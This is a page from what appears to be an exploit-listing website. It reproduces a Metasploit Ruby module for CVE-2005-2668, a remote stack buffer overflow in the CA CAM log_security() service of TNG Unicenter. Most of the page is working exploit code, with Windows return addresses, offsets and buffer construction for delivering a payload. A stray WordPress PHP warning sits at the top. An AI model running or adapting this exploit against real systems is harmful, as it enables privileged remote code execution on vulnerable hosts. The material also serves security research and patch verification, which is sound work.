Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
CA CAM log_security() Stack Buffer Overflow (Win32) - exploit.company
header-logo
Suggest Exploit
vendor:
TNG Unicenter
by:
hdm
7.5
CVSS
HIGH
Stack Buffer Overflow
119
CWE
Product Name: TNG Unicenter
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2005-2668
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows
2005

CA CAM log_security() Stack Buffer Overflow (Win32)

This module exploits a vulnerability in the CA CAM service by passing a long parameter to the log_security() function. The CAM service is part of TNG Unicenter. This module has been tested on Unicenter v3.1.

Mitigation:

Apply the necessary patch or upgrade to a non-vulnerable version.
Source

Exploit-DB raw data:

##
# $Id: cam_log_security.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CA CAM log_security() Stack Buffer Overflow (Win32)',
			'Description'    => %q{
					This module exploits a vulnerability in the CA CAM service
				by passing a long parameter to the log_security() function.
				The CAM service is part of TNG Unicenter. This module has
				been tested on Unicenter v3.1.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2005-2668'],
					['OSVDB', '18916'],
					['BID', '14622'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'StackAdjustment' => -3500,
				},
			'Targets'        =>
				[
					# W2API.DLL @ 0x01950000 - return to ESI
					['W2API.DLL TNG 2.3',  { 'Platform' => 'win', 'Ret' => 0x01951107 }],

					# Return to ESI in ws2help.dll
					['Windows 2000 SP0-SP4 English', { 'Platform' => 'win', 'Ret' => 0x750217ae }],
					['Windows XP SP0-SP1 English',   { 'Platform' => 'win', 'Ret' => 0x71aa16e5 }],
					['Windows XP SP2 English',       { 'Platform' => 'win', 'Ret' => 0x71aa1b22 }],
					['Windows 2003 SP0 English',     { 'Platform' => 'win', 'Ret' => 0x71bf175f }],
				],
			'DisclosureDate' => 'Aug 22 2005',
			'DefaultTarget' => 0))
	end


	def check
		connect
		ack = sock.get_once
		disconnect

		(ack == "ACK\x00") ? Exploit::CheckCode::Detected : Exploit::CheckCode::Safe
	end

	def exploit
		connect

		ack = sock.get_once
		if (ack != "ACK\x00")
			print_status("The CAM service is not responding")
		end

		buf = rand_text_english(4096, payload_badchars)

		# Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
		buf[ 1016, 4 ] = [target.ret].pack('V')
		buf[ 1052, payload.encoded.length ] = payload.encoded

		sock.put("\xfa\xf9\x00\x10" + buf + "\x00")

		handler
		disconnect
	end

end

Navigation

Suggest Exploit

Services By CQR